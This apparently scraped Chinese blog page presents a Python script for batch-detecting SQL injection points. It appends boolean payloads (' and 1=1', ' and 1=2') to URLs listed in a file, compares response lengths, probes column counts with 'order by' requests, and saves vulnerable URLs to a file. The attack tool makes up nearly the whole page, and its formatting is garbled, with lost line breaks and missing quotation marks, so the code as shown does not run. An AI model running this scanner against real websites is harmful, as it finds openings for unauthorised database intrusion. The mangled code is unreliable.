1. 程式人生 > >python批量檢測註入點腳本


err resp utf-8 start odin chan out elif time

# -*- coding:utf-8 -*-
def logo():
    print ("                                               ***                  ")
    print ("                                             *     *                ")
    print ("                    author:                 *       *               ")
    print ("                            Screw            *                      
") print (" ***** ") print (" * ") print (" * * ") print (" blog: * *
") print (" *** ") print (" http://www.cnblogs.com/pojun/ ") #運行環境python3.0 批量的話,在本目錄建一個url.txt文件將註入點導入。 import threading import requests i=0 err=true exp=[ and 1=1, and 1=2] chang=[] new_str
="" #判斷註入點 def judge(): for i in range(2): request=url+exp[i] try: respons1=len(requests.get(request).text) except: print(u"網站有waf,連接被重置!") exit() chang.append(respons1) if(chang[1]!=chang[0]): print(u網站======>存在註入!) field(url) else: print(u網站=======>" 不 "存在註入!) #判斷字段(field) def field(weburl): j=0 a1="" a2="" while j<30: j+=1 if(j%2!=0): request=weburl+" order by "+str(j) try: a1=len(requests.get(request,timeout=1).text) except: pass else: request=weburl+" order by "+str(j) try: a2=len(requests.get(request,timeout=1).text) except: print(u"網站有waf,連接被重置!") if(a1!=a2 and j>1): print(u"字段數為========================>",j-1) break #批量 def piliang(): str=open(url.txt,encoding="utf-8").read() a=str.split(\n) url_num=len(a) for i1 in range(url_num-1): chang=[] print (a[i1]) for i2 in range(2): request=a[i1]+exp[i2] try: respons1=len(requests.get(request,timeout=1).text) except: global err err=false print(u"網站有waf,連接被重置!") break if err==true: chang.append(respons1) if err==true: if(chang[1]==chang[0]): print(u網站========>" 不 "存在註入!) else: print(u網站========>存在註入!) # field(a[i1]) new_str=a[i1]+\n o=open(ture_sql.txt,a) o.write(new_str) err=true print(u1.批量註入,存在本目錄的1.txt 2.單點註入,並判斷字段數 ) id=int(input("ID? :")) if(id==1): t1=threading.Thread(target=piliang) t1.start() t1.join() elif(id==2): url=input(url :) judge() t2=threading.Thread(target=field,args=(url,)) t2.join() else: print(u"輸入錯誤!") logo()

